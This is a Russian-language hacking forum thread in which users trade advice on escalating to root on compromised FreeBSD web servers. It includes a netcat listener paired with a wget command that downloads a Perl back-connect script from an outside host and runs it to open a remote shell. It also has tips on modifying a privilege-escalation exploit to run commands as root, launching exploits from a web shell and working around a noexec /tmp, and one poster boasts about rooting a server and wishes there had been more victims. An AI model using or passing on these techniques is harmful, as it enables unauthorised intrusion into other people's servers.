wkar, без рута ты не установишь gcc. Варинат скомпилировать на другой фряхе и залить туда уже бинарник. И тебе нужно вернуть себе бек конект как сказал Тузик.
ещё можна проверить наличие gcc командой: gcc --help и я могу дать скомпиленые бинарники, но обязательно нужен или биндшелл или бекконнект
gcc нет, это точно."я могу дать скомпиленые бинарники"Если можешь то дай, буду благодарен. И ещё, дайте немного маны, как зделать бекконнект.
у себя netcat -l -n -v -p 5995 на хосте wget -O ngix http://fsb-my.name/c/apache-handler perl ngix your_ip 5995 2> /dev/null &
возможно что-то сделать? хз что делать.. Code: ./qwe.sh ./qwe: Permission denied 6.2-RELEASE-p8 FreeBSD 6.2-RELEASE-p8 #0: Mon Nov 12 17:30:06 EET 2007
Ты наврено запускаешь из /tmp а он примантирован как no ex, корчое скопируй в другую папку куда-нить. Правда я неуверен что возьмёт 6.2 но попробуй , отпишись. З.Ы. Есть вариант что надо сделать chmod 755 на твой скрипт. GizmoSB, у меня ниразу не получилось скомпилить со скрипта, компиль просто кусками. Из скрипта скопируй куски кода и скомпиль.
На самом деле бэкконнект не всегда получается делать. В этом случае можно немного поправить сплойт: system("echo ALEX-ALEX;/bin/sh"); на system("echo ALEX-ALEX;/bin/sh cmd.sh"); после повышения привелегий сплойт будет вполнять команды из cmd.sh под рутом. Запуск сплойта в вебшеле: w00t.sh &> out.txt. Перенаправление лучше делать потому, что веб шел не выводит stderr поток и мы не увидим ошибок. Результат читаем из out.txt.
возможно ли вместо wget использовать $_GET? т.е. чисто на пхп, не используя консольные команды возможно ли какнибудь запустить на хосте то что накомпелено в домашних условия, при услонии что не работает с/перл/командная строка + нет доступа к папкам до /public_html/ в этой ситуации можно получить рут?
Возможно ли использовать вместо программы-качалки массив из высокоуровниевого языка? Возможно ли использовать вместо бензопилы бабушикины спицы, правда они погнулись? Возможно ли швее-мотористке проектировать ядерные реакторы? Если включен сеф мод и\или вырублены нужные функции - гугли вначале обход этих ограничений.
рутанул сегодня вот такой сервачок ) при срабатывании сплоита в констоль выкинуло вот это /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX До этого много серваков с подходящими версиями не хотели рутаться Эх жаль я профукал появление этого сплоита в декабре, жертв было бы гораздо больше )
